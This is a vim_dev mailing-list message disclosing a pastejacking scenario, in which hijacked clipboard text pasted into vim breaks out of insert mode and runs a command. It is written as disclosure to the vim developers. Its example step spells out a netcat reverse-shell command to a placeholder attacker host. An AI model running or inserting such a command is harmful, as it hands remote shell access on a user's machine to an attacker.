On 01/19/2017 08:05 AM, Marc Weber wrote:
>
> Insert mode is not for pasting, see pasttoggle / paste optoins.
> :r!cat then ctrl-d is a fast workaround for linux systems.
>
> If you can reproduce your issue with paste mode you clearly have a found
> a bug (IMHO). In the other case I'm unsure because pasting is no
> different from typing thus you probably can paste :!<run command>
> equally well in some way or <c-r>=system('...') like command (no idea,
> never tried it)
>
> Other people might have more knowledge.
>
> Marc Weber
>
The trigger in this is a commonly used "ctrl+shift+v". I have asked
around a few vim users about how they copy a text from a website into a
file opened by vim. It looks like that everyone is doing that way.
Maybe I was not clear enough in the first mail, but the exploit scenario
can be the following:
1. User opens a website, for example "Vim Tutorial".
2. User copies text from the webpage, but it's pastejacked (eg. the user
copies the exploit payload and not what he sees on the site). Reference:
https://github.com/dxa4481/Pastejacking
3. User insert this text by "ctrl+shift+v" into a file opened by vim.
(note: he does not even need to be in INSERT mode of course.)
4. Then by this, INSERT mode is escaped if needed and the following is
executed: nc -e /bin/sh r3m0te.com 80
In case the file containing the crafted message, it does not escape, but
in case of manual copy paste there is always a way to make it work.
If you think it's just a bug, then I can share the PoC here, but for
sure it can be really dangerous.
cheers,
sıx
--
--
You received this message from the "vim_dev" maillist.
Do not top-post! Type your reply below the text you are replying to.
For more information, visit http://www.vim.org/maillist.php
---
You received this message because you are subscribed to the Google Groups
"vim_dev" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
For more options, visit https://groups.google.com/d/optout.
